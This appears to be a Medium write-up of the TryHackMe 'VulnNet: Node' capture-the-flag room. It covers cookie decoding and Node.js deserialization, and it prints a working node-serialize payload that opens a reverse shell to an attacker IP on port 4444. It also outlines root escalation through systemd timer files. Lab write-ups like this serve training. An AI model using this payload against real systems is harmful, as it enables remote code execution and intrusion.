VulnNet: Node TryHackMe WalkThrough

VulnNet Entertainment has moved its infrastructure and now they’re confident that no breach will happen again. You’re tasked to prove otherwise and penetrate their network.

  • Difficulty: Easy
  • Web Language: JavaScript

Enumeration

only 8080 is available

More Enumeration…

Manual Enumeration

  • No sensitive data on the source code.

Let’s open burp and catch the data.

Looking the cookie, i can see that the value of session is a base+url encode value.

eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D

{“username”:”Guest”,”isGuest”:true,”encoding”: “utf-8”}

So, the only way into the machine is through some RCE cause tampering the values of the cookie may not give anything.

Let’s Learn & Hack

Use the same cookie and request the home page /
  • Point to note is that we can see that we have unserialise error.

Let’s use the payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#nodejs

Used payload: {“username”:”_$$ND_FUNC$$_function (){(function(){var net = require(‘net’),cp = require(‘child_process’),sh = cp.spawn(‘/bin/sh’, []);var client = new net.Socket();client.connect(4444, ‘10.14.12.48’, function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});})();}()”}

Got the reverse shell as www, and doing a lateral escaltion,

Privilege Escalation

change the .timer and .service file to get the reverse shell.

will get root shell in 1sec

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store